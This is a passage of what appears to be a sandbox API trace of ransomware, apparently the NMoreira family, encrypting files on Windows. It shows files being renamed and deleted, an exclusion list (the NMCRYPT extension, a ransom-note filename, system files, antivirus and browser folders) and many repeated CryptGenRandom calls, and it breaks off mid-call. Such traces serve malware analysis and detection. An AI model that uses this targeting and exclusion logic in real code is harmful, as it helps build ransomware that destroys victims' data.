_Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" [0164.069] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0164.069] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF458.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf458.tmp")) returned 0xf458 [0164.069] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF458.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf458.tmp"), dwFlags=0x1) returned 0 [0164.070] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF458.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf458.tmp")) returned 1 [0164.070] CryptDestroyKey (hKey=0x9ad538) returned 1 [0164.070] wcslen (_String="OK") returned 0x2 [0164.070] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.070] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0164.070] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0164.070] CryptDestroyHash (hHash=0x9ad678) returned 1 [0164.070] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0164.070] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*NMCRYPT") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*Recovers your files.html") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.exe") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.dll") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.lnk") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.bat") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.ini") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.msi") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*.scf") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*pagefile.sys*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*NTUSER.DAT*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*AppData*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\winrar\\*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\java\\*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0164.070] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\windows\\*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\ESET\\*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\AVG\\*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\AVIRA\\*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*Atheros*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*Realtek*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*bootmgr*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*boot*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*boot*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*CONFIG.SYS*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*IO.SYS*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*MSDOS.SYS*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*NTDETECT.COM*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*ntldr*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*chrome*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*opera*") returned 0 [0164.071] PathMatchSpecW (pszFile="Month_Calendar.emf", pszSpec="*firefox*") returned 0 [0164.071] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Month_Calendar.emf", pszSpec="*") returned 1 [0164.071] strlen (_Str="NMoreira") returned 0x8 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.071] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.073] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.074] CryptGenRandom (in: 